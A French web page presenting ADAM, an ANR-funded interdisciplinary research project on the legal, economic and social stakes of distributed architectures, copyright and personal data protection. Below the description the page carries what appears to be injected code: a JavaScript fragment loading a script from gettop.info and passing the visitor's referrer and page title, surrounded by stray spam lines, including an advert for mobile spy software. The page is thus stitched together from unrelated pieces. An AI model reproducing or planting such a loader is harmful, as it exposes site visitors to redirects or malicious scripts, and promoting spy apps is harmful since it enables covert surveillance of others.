ADAM

ADAM (http://adam.hypotheses.org) est un projet de recherche financé par l’ANR qui vise à étudier les enjeux techniques, sociaux, économiques, et juridiques des architectures distribuées. Ce projet rassemble une dizaine de chercheurs au sein d’une équipe interdisciplinaire où collaborent des juristes, des économistes, des sociologues et des informaticiens. Le projet étudie les modèles de gouvernance socio-technique qui s’instaurent dans le paysage numérique, un domaine où la régulation juridique a du mal à se faire appliquer.
Il analyse notamment les enjeux juridiques des nouvelles technologies, en mettant en évidence leur capacité à détourner les règles du droit, et en dénonçant l’impact de ce détournement sur les droits des internautes. Le but est d’identifier ou de trouver les solutions susceptibles d’apporter des réglementations fiables en ce qui concerne notamment les droits d’auteur et le droit sur la protection des données personnelles.

Agree to be bound our portal by the terms of this agreement.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if (document.currentScript) { The most popular 2017 spy software applications for the mobile phones.

Comments are closed.

© 2015 Sofarider Inc. All rights reserved. WordPress theme by Dameer DJ.